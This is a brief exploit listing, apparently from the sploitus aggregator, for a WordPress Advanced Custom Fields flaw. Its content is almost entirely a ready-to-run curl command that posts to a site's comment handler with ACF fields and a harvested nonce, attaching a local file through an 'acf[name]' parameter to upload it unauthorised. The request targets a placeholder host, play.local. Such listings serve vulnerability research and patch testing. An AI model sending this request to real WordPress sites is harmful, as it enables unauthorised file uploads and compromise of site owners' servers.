Share
## https://sploitus.com/exploit?id=WPEX-ID:3FDE5336-552C-4861-8B4D-89A16735C0E2
The nonce is retrieved from a form in the frontend

curl \ 
-i -s -k -X 'POST' \ 
-F "comment=Test comment" \ 
-F '_acf_post_id=1' \ 
-F '_acf_validation=1' \ 
-F '_acf_nonce=ba2ef314e0' \ 
-F '_acf_changed=0' \ 
-F 'acf[field_62c8939d255d8]=Something' \ 
-F 'author=testing' \ 
-F 'email=testing@example.com' \ 
-F 'url=' \ 
-F 'submit=Post+Comment' \ 
-F 'comment_post_ID=1' \ 
-F 'comment_parent=0' \ 
-F 'acf[name]=@rickroll.mp4' \ 
'http://play.local/wp-comments-post.php'